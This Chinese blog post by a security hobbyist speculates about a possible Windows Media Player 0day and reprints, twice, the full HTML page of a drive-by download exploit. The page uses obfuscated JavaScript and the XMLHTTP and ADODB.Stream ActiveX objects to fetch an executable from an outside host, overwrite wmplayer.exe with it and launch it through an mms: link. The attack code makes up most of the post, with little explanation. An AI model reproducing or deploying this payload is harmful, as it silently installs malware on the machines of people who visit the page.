本文来自死性不改的博客 http://www.clxp.net.cn 转载请保留此申明!
今天看蔚蓝彩虹提供的病毒地址,,无意发现这么一个情况,但是自己测试没成功。。不知道是不是下一个非常广泛被利用的0day。我只是对安全方面有爱好。但是没深入系统的学习过。。在此提出希望不会收到大家的萝卜白菜。。
完整代码
程序代码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Windows Media Player Oday Test!</title>
</head>
<textarea id="code" style="display:none">
var h=new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50");
h.open("GET","http://www.30356769.cn/killbase/me.exe";,false);
h.send();
var s=new ActiveXObject("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");
s.type=1;
s.open();
s.write(h.Responsebody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
s.close;
location.href="\x6d\x6d\x73\x3a";
</textarea>
<script>
var url=document.all.code.value;
url=url.replace(/\r\n/g,"");
url=url.replace(/\\/g,"\\\\");
url=url.replace(/\"/g,"\\\"");
url=url.replace(/\//g,"%2f");
window.open("file:java script:eval(decodeURI(\""+url+"\"))","\x5f\x6d\x65\x64\x69\x61");
</script>
<body>
<p>黑网之神修改</p>
<p>hi.baidu.com/sksgod</p>
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Windows Media Player Oday Test!</title>
</head>
<textarea id="code" style="display:none">
var h=new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50");
h.open("GET","http://www.30356769.cn/killbase/me.exe";,false);
h.send();
var s=new ActiveXObject("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");
s.type=1;
s.open();
s.write(h.Responsebody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
s.close;
location.href="\x6d\x6d\x73\x3a";
</textarea>
<script>
var url=document.all.code.value;
url=url.replace(/\r\n/g,"");
url=url.replace(/\\/g,"\\\\");
url=url.replace(/\"/g,"\\\"");
url=url.replace(/\//g,"%2f");
window.open("file:java script:eval(decodeURI(\""+url+"\"))","\x5f\x6d\x65\x64\x69\x61");
</script>
<body>
<p>黑网之神修改</p>
<p>hi.baidu.com/sksgod</p>
</body>
</html>
<title>Windows Media Player Oday Test!</title>
不久之后可能就变为
<title>Windows Media Player Oday !</title>
下一个到来的会是Windows Media Player 0day吗? - 死性不改's Blog~
http://www.clxp.net.cn/article.asp?id=1219#top |